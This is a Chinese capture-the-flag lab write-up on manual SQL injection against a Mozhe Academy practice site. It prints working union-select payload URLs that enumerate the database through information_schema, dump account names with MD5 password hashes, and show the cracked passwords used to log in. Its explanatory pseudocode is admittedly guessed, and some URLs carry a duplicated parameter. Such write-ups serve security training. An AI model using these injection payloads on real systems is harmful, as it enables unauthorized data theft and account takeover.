———靶场专栏———


声明文章作者weoptions学习练习过程中的步骤思路,非正式答案,仅供学习参考

 

靶场背景

 

来源

        墨者学院

 

简介

        安全工程师“墨者”最近练习SQL手工注入漏洞自己搭建一个靶场环境Nginx+PHP+MySQL,PHP代码客户端提交参数未做任何过滤。尽情的练习SQL手工注入吧。

 

实训目标

1.掌握SQL注入原理
2.了解手工注入方法
3.了解MySQL的数据结构
4.了解字符串的MD5加解密

 

解题方向

        手工进行SQL注入测试获取管理密码登录


 

解题思路

        这是字符注入可能会涉及到注释字符,嗯~ o(* ̄▽ ̄*)o,MD5肯定就是MD5加密喽~

找到注入点,再用语句尝试查询数据库信息,再用select查找我们需要管理员登陆信息

 


 

解题步骤

        

        一、找到注入点

 

靶场~启动!!!(我的三个币啊/(ㄒoㄒ)/~~)

4a34542fdbb64093b0a1d5dfb05b630c.png

814914899c4b4767a9fc0a52ceedba6c.png.

这里有个停机维护通知我们点进去看一眼。

c6f201825f2247ab9dd649ccefc602ba.png

http://124.70.91.203:49986/new_list.php?id=tingjigonggao

找到了,id=tingjigonggao,这可能是一个注入点,尝试一下。

http://124.70.91.203:49986/new_list.php?id=tingjigonggao' and '1'='1

输入页面正常显示,因为sql语序检查的是一个字符串,而字符串表示为’text‘,用单引号括起来的。假如网站sql语句为 (瞎写的,不知道对不对)

$id = $_GET ‘id

$SQL = select * from user where id = $id

那么原来输入就是

$SQL =$_GET select * from user where id=’tingjigonggao

我们验证输入的是

$SQL =$_GET select * from user where id=’tingjigonggao’ and ‘1’=’1′

时候正常显示说明我们的注入语句正确的,再尝试tingjigonggao’ and ‘1’=’2’,验证注入点到底是不是在这里

http://124.70.91.203:49986/new_list.php?id=tingjigonggao' and '1'='2

6e3de162b61e4f829a2e3c7d1446c8a4.png

OK,(机智.jpg)说明注入点就是在id = ‘ ‘ 这里

 


 

        二、order by字段

 

有点繁琐,直接把最终url信息发出来了。

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,2,3,4'

2b94cbea8930402bb36d11586e2f19af.png

order by 可以查询数据表字段数量,一来可以找到回显字段,二来方便摸清正在访问数据表中有几个列。

根据结果显示,正在访问数据表有四个列,其中有第二列和第三列是有回显的。

 


 

        三、查询数据库信息

version()                                数据库版本

database()                        数据库名称

user()                                数据库用户

@@version_compile_os       操作系统

例:

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,version(),3,4'

我们拿到的信息为

数据库版本:10.2.15-MariaDB-log

数据库名称:mozhe_discuz_stormgroup

数据库用户root@localhost

操作系统:Linux

可以看到root账户,管理员账户,是有权限进行增删改查和其他操作的。嗯?我们题目不是mysql数据库吗?管他呢。可以理解为MariaDB是mysql升级版(其实不是),向下兼容

 


 

        四、查数据库

 

MySQL高版本(5.0以上)都有一个称为information_schema数据库,其中存放数据库所有的表名列名信息。我们去查查看一下。

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,table_name,3,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup'--+

解析为,查 “表名” 来自“information_schema数据库下面的tables表” 限定数据库名=“mozhe_discuz_stormgroup”。后面的“–+”,“–”是注释后面的符号,“+”代表的是空格

1ac37d38f3ed4aefbfcf4fe5b4c8a94e.png

我们再用group_concat()函数将所有都展示出来。

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup'--+

946b9ea7793a4f8a80a46aa2b8eb6995.png

 


 

        五、查询用户信息表

 

用户信息就在stormgroup_member(译为风暴组成员),notice(注意)里面没有的,别问,问就是试过了。

d595391d254e4350b6f4b1e3246be097.png

开叉,呸~,开查!!!

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member'--+

 

9a8fff36be9a4e4bae1ca040f9ce2894.png

id,name,password,status

至此我们拿到的信息为mozhe_discuz_stormgroup数据库下面有个数库表stormgroup_member下面有数据库列id,name,password,status

接下来,我们就去mozhe_discuz_stormgroup数据库下的stormgroup_member表查name,和password就行了。

 


 

        六、查用户数

 

url码为:

124.70.91.203:49986/new_list.php?id=?id=-1' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member--+

e6f341ceb31745f28b6012c4e409626f.png

拿到两个账号和密码

①mozhe,356f589a7df439f6f744ff19bb8092c0

②mozhe,a8eed3d6ee9831d950d5b4dc2e27e506

密码进行MD5解密后为

①mozhe,dsan13

②mozhe,437917

md5在线解密破解,md5解密加密

 


        

        七、登陆尝试

 

①mozhe,dsan13

ffd427f8458d49db971f5a9bd9556acf.png

②mozhe,437917

ee950f2bfb7a4721add9a77d9030382d.png

成功拿到key

 


 

总结

 

        难度★★★☆☆☆☆☆☆☆

        解析本身难度不是很高,但是手工注入容易出错字母不好打对),熟练就好了。

 

        有需要工具的请私信

 


 

 

原文地址:https://blog.csdn.net/weoptions/article/details/134744111

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_44358.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注